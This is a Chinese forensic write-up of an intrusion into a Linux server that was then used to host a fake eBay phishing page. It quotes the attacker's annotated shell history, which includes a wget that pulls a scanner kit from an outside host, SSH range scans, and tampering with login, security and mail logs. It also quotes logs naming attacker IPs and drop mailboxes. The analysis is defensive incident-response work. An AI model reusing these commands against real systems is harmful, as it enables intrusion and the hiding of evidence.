|
一次网络钓鱼后台的应急分析(原创)
author:bobkey
date:060521
mail:toqinbo@msn.com
网络钓鱼在我处理的过程中,遇见过4次,而每次的攻击手法和工具都几乎一摸一样,可以想象这是一个高度合作的黑客团伙。
接到客户应急电话,迅速赶到IDC机房,以下是分析过程。
1. 攻击过程如下:
通过系统服务漏洞攻击成功――登陆系统――安装配置httpd――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到攻击者邮箱。
2. 结果分析
基本过程:
暴力破解ssh成功――登陆系统――安装配置rootkit和backdoor――下载ebay伪造网络钓鱼页面文件――成功获取用户帐号和密码,并用sendmail发送到攻击者邮箱――扫瞄其它机器端口和猜测其它机器密码。
此机器10月29日被入侵,根据手法和目的,应该是一个黑客组所为,以前已经发现过类似事件,此机被安装rootkit和后门,不可信任了,建议备份数据后,重新安装系统.
攻击时间段:
10月29日09:21:33成功破解
10月29日09:24登陆系统
11月5日 安装rootkit和backdoor 扫描软件
Rootkit替换了ps ls top netstat
Backdoor /usr/bin/ smbd –D
扫描软件/.scan /var/tmp /var/tmp/.mr004 /usr/lib/.cgi-bin,
11月5日 17:30:41 开始攻击其他机器,扫瞄其它机器端口和猜测其它机器密码
2.1 系统检查可疑文件
留下backdoor和rootkit和多个黑客工具
/usr/lib/.cgi-bin,黑客工具
/var/tmp/.mr004黑客工具
/.scan 黑客工具
/home/home黑客工具
/home/m.log ip记录
games /usr/games黑客工具
/var/tmp 黑客工具
/tmp/screens黑客工具
/usr/bin/ smbd -D目录下,后门进程,不能用ps查看,可用pstree和lsof看到
file /usr/bin/smbd\ -D
/usr/bin/smbd -D: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), not stripped
用ps –ef看不到系统真实信息,进程被篡改
2.2 日志分析
为了显示效果,红色标记的为分析,其他为原始记录
~/.bash_history
此目录为以前建立,但history已经被删除部分
cd /usr/lib/.cgi-bin/
ls
cd .mr
cd /usr/games
建立目录
mkdir .cgi
cd .cgi/
ls
下载扫描器
wget www.tomis3.us/Hacks/scan.tgz
ftp
ftp 68.142.234.89
解压并删除原文件
tar zxzvf scan.tgz ;rm -rf scan.tgz \
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
ls
rm -rf pass_file
cd ..
mv pass_file .mr004/
cd .mr004/
ls
screen已经被删除,恶意软件
screen
cat vuln.txt
rm -rf vuln.txt
cd /var/tmp/.mr004/
cat vuln.txt
ls -la
screen -r
screen -r 4583.pts-0.Linuxbackup
screen -wipe
screen
exit
socklist
w
screen -r
history
cd .scan
ls
cd /var/tmp
cd .mr004
ls
杀死screen进程
killall -9 screen
killall -9 SCREEN
扫描,分析了x内容是根据129为参数$1,表示从129开始的地址依次扫描端口为22的目标机器
./x 129
Ls
查看扫描结果
cat vuln.txt
screen –r
继续扫207开始的地址
./x 207
pwd
cd /var/tmp/.mr004
killall -9 screen
service ssh restart
service sshd restart
service sshd reload
history
locate bios.txt
cd /home/.scan/.mr004/
ls -a
ps ax
screen -r 5180
screen -wipe
ls -a
rm -rf .mr004 .ssh-scan.swp mfu.txt bios.txt
ls -a
pico pass_file
nano pass_file
rm -rf pass_file
nano pass_file
screen
cd /usr/lib/.cgi-bin/
ls
w
sense /usr/lib/libice
cd .mr
ls
cd /usr/games/
cd .cgi/
ls
cd .mr004/
ls
cat vul
cat mfu.txt
ps –aux
查找扫描结果,傻了吧
locate mfu.txt
cd /home/.scan/.mr004/
ls
cat mfu.txt
ls
做贼心虚,经常看是否有人在线否
w
cd /usr/lib/.cgi-bin/
ls
cd .c
ls
cd .mr004/
ls
cat vuln.txt
ls
还看,唉
w
ls
有完没完
w
删除mail日志,毒
rm -rf /var/spool/mail/root
ls
cd ..
ls
胆小的黑客
w
rm -rf .mr004/
下载黑客工具,开始已经下了,估计又找不到了,重下
wget www.tomis3.us/Hacks/scan.tgz
ftp
rm -rf .mr
tar zxzvf scan.tgz ;rm -rf scan.tgz
cd .mr004/
l
cd .mr004
ls
扫描210段的ssh
./x 210
W
扫描194段的ssh
./x 194
ls
rm -rf mfu.txt
rm -rf bios.txt
扫描205段的ssh
./x 205
w
history
cd /home/.scan/.mr004/
ls
screen
screen -r
w
查看进程
ps aux
然后重启
reboot
cd /usr/games/
cd .mr
ls
cd .cgi
cd .mr004/
cat vul
ls
ps -aux
cd /home/.scan/
ls
cd .mr004/
ls
查看自己的痕迹
history
killall -9 screen
cd /usr/games/.cgi
ls
cd .mr004/
ls
cat pass_file
screen
继续扫61段
./x 61
w
ps aux
cd .scan
ls -a
cd .ssh
ls
cd ..
cd /tmp
ls -a
cd screens
ls
cd S-root
ls
cd ..
ls
history
cd /home/.scan/.mr004/
ls
./x 71
cd /etc
ls
pwd
修改了口令档案
vi passwd
vi shadow
看磁盘空间
df –k
下面大量查看进程和端口行为
ps -ef
ps -ef
more /etc/shadow
sync
sync
sync
reboot
ps -ef
last -2-
last -20
ps -ef
which ps
ls -l /bin/ps
top
ls
lsof -a
lsof
lsof |more
lsof |more
ls
lsof |more
1586 daemon mem REG 8,1 1563240 160325 /lib/tls/libc-2.3.2.so
ls
lsof -l | more
lsof -l | more
cd /dev/initctl
env
LANG=C
export
lsof -l | more
cd /dev
cd initctl
ls -ln initctl
more initctl
netstat -an
netstat -an
ps -ef
last
lsof
lsof -l | more
migration
ps -ef
lsof -l | more
cd /
./migration
ls -a
find / -name migration
netstat -an
netstat -an | more
netstat -an | more
lsof -l | more
ls
lsof
看登录日志
last
reboot
last
date
cd /var
ls
cd log
ls
ls -ln lastlog
date
修改lastlog权限并删除部分内容
chmod 777 lastlog
ls -ln
ls -ln lastlog
more lastlog
!
ls
vi lastlog
cd /etc
ls
vi hosts.allow
ls
last
su - goldensai
last
last
修改了这个,已经不可信了
vi hosts.allow
ls
ls
last
netstat -an
ps -ef
cd /etc
vi hosts.allow
ls
ls
ls
lsof | more
lsof
last
cd /var/log
ls
more messages
ls
查看日志
tail messages
ls
last
cd /etc
查看允许登录ip列表的文件
more hosts.allow
last
cd /var
;s
ls
cd log
ls
tail messages
ls
ls -ln
more xferlog
cd /home/home
ls
ls -ln
ls -l
pw
pwd
cd ..
ls
pwd
cd ..
ls
cd home
ls
cd home
ls
解压rootkit文件
tar -xvf rk.tar
ls -ln
cd red
ls
cd crontabs
LANG=C
export LANG
LS
Ls
查看计划任务
more crontabs
ls
ls -l
pwd
cd ..
ls
这个黑客水平不咋样,碰到zip文件就傻了,不会解压了
tar mail.zip
tar -xvf mail.zip
ls
重于解压了
unzip mail.zip
ls
ls
ls
ls -ln
ls -ln
pwd
pwd
pwd
cd ..
ls
ls
cd /var
ls
cd log
ls'
ls
tail xferlog
tail -50 xferlog
ls
tail messages
tail -50 messages
ls
cd /home/home
ls
ls -ln
ps -ef | more
uname -a
lsof | more
last | more
cd /var
ls
cd log
ls
ls -l
ls -l messages*
唉,肯定删除了内容,重要的被抹去了
vi messages.1
tail messages.1
ls
vi messages
netstat -na | more
lsof -i : 23
lsof -i :23
lsof -i :111
more /etc/hosts.allow
more /etc/hosts.deny
vi /etc/hosts.deny
ps -ef | more
到收尾阶段了,不停查看日志和进程信息
lsof | more
netstat -na | more
lsof -i :1011
last | more
last | more
cd /var
ls
cd log
ls
more lastlog
ls
more secure
ls
修改了secure和messages日志
vi secure
ls
vi messages
lsof | more
ps -ef | grep vsftpd
find / -name vsftpd
ls -l /usr/sbin/vsftpd
man vsftpd
lsof -i :21
ps -ef | grep smbd
man smbd
ps -ef | grep cupsd
ps -ef
ps
man ps
ps -e
ps -A
ps -er
ps -A
ps -d
ps -e
lsof | more
cd /etc
ls
ls rc*.d
cd rc2.d
ls
clear
ls -l S*
clear
ls S*
ls
cd ..
ls
cd xinetd.conf
more xinetd.conf
ls
cd xinetd.d
ls
ls -l
more krb5-telnet
ls
cd ..
cd rc0.d
ls S*
cd ..
cd rc1.d
ls S*
ls -l
clear
ls -l S*
cd ..
cd rc2.d
ls -l S*
cd ..
ls
cd rc3.d
ls -l S*
cd ..
ls
cd rc4.d
ls -l S*
cd ..
man find
查找所有指定时间内修改了的文件
find rc*.d -c -30
man find
find rc*.d -ctime -15
find rc*.d -ctime -30
find / -ctime -15
clear
ls
cd /home
ls
find /usr -ctime -15 > m.log
more m.log
ls -l /usr/bin/socklist
ls -l /usr/games/.cgi/.mr004/x
ls -ld /usr/games
ls -ld /usr/lib/.cgi-bin
man socklist
ls -l /usr/include/iceseed.h
more /usr/include/iceseed.h
more m.log
ls -l /usr/include/icepid.h
more /usr/include/icepid.h
ls -ld /usr/games
cd /usr/games/.cgi
ls
ls -a
cd .mr004
ls
more gen-pass.sh
ls
more pass_file
ls
ls -l psscan2
ls -l ssh-scan
more ssh-scan
ps -ef | grep ssh-scan
pwd
ls
ls SS
ls X
ls a
more a
ls
more bios.txt
ls
Secure.2和message.4
中的日志中有大量远程暴力破解ssh telnet用户和口令的记载,ip来自不同的地方
Oct 24 00:50:14 Linuxbackup sshd[1691]: Failed password for illegal user toor from 219.254.35.71 port 33558 ssh2
Oct 24 00:50:18 Linuxbackup sshd[1693]: Illegal user user from 219.254.35.71
Oct 24 00:50:20 Linuxbackup sshd[1693]: Failed password for illegal user user from 219.254.35.71 port 34522 ssh2
Oct 24 00:50:22 Linuxbackup sshd[1695]: Illegal user user from 219.254.35.71
Oct 29 13:56:22 Linuxbackup xinetd[1462]: START: telnet pid=1863 from=219.130.167.11
Messages.2
错误日志,发送错误的ICMP类型为11,并通过网卡eth0广播出去
Oct 23 04:06:43 Linuxbackup kernel: 61.144.56.34 sent an invalid ICMP type 11, code 1 error to a broadcast: 0.0.0.0 on eth0
10月23日来自美国的ip成功通过后门连接进来
Oct 23 16:51:52 Linuxbackup smbd -D[31033]: log: Connection from 85.186.209.59 port 1172
这析地址也都成功登录本机器
IP : 61.129.78.101
地址: 上海市浦东新区 ADSL
IP : 218.5.5.3
地址: 福建省福州市 福建政法管理干部学院
IP : 205.234.137.241
地址: 美国/加拿大 CZ88.NET
Access.log.2
有如下可疑访问,证明访问者访问了假的ebay登录页面,黑客制造假的Investigation页面和校验账号页面在/var/www/html/.eBay下,让ebay用户登录,从而获取账户信息
212.93.137.44 - - [28/Oct/2005:04:12:21 +0800] "GET /icons/unknown.gif HTTP/1.0" 200 245 "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.93.137.44 - - [28/Oct/2005:04:28:51 +0800] "GET /.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account_files/cobrand_determine.js HTTP/1.0" 304 - "http://61.144.56.34/.eBay/eBayISAPI.dll.SignIn/.eBay_Account_Investigation/eBay_com%20Verify%20your%20eBay%20account.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Maillog.2
被诱骗到的口令文件通过sendmail发送到 capdemagar@yahoo.com sanuciordesti@yahoo.com multecarti@yahoo.com cr3ativexxl@yahoo.com multew@4x.ro多个邮箱地址
Oct 28 04:14:59 Linuxbackup sendmail[29986]: j9RKExXt029986: to=antrax<sanuciordesti@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30117, dsn=4.4.3, stat=queued
Oct 28 04:17:03 Linuxbackup sendmail[29988]: j9RKH3Sd029988: to=antrax<capdemagar@yahoo.com>, delay=00:00:00, mailer=esmtp, pri=30326, dsn=4.4.3, stat=queued
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: from=root, size=1960, class=0, nrcpts=1, msgid=<200510290505.j9T55oLr001856@localhost.localdomain>, relay=root@localhost
Oct 29 13:05:50 Linuxbackup sendmail[1856]: j9T55oLr001856: to=multecarti@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31960, dsn=4.4.3, stat=queued
Oct 17 23:03:09 Linuxbackup sendmail[12283]: j9HF398d012283: to=cr3ativexxl@yahoo.com, delay=00:00:00, mailer=esmtp, pri=31525, dsn=4.4.3, stat=queued
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: from=root, size=3346, class=0, nrcpts=1, msgid=<200510182220.j9IMKlTN031147@localhost.localdomain>, relay=root@localhost
Oct 19 06:20:47 Linuxbackup sendmail[31147]: j9IMKlTN031147: to=multew@4x.ro, delay=00:00:00, mailer=esmtp, pri=33346, dsn=4.4.3, stat=queued
网络钓鱼攻击的一些特点:
1 大规模扫描有漏洞的主机
2 批扫描工具
3 攻陷有漏洞的主机
4 个人PC主机
5 架设钓鱼网站
6 前台假冒网站:知名的金融机构、在线电子商务网站
7 后台脚本:收集、验证用户输入,并通过某种渠道转发给钓鱼者
它的攻击目标只有一个:获取个人敏感信息(信用卡帐号密码等)
伪装架设知名金融机构及商务网站进行欺骗用户
并且会发送大量欺骗性垃圾邮件到各个用户
所以现在的黑客已经从原来单纯的技术研究和破坏转入到经济利益为目的的攻击了,而且加强了攻击的合作化和批量自动化。 |
|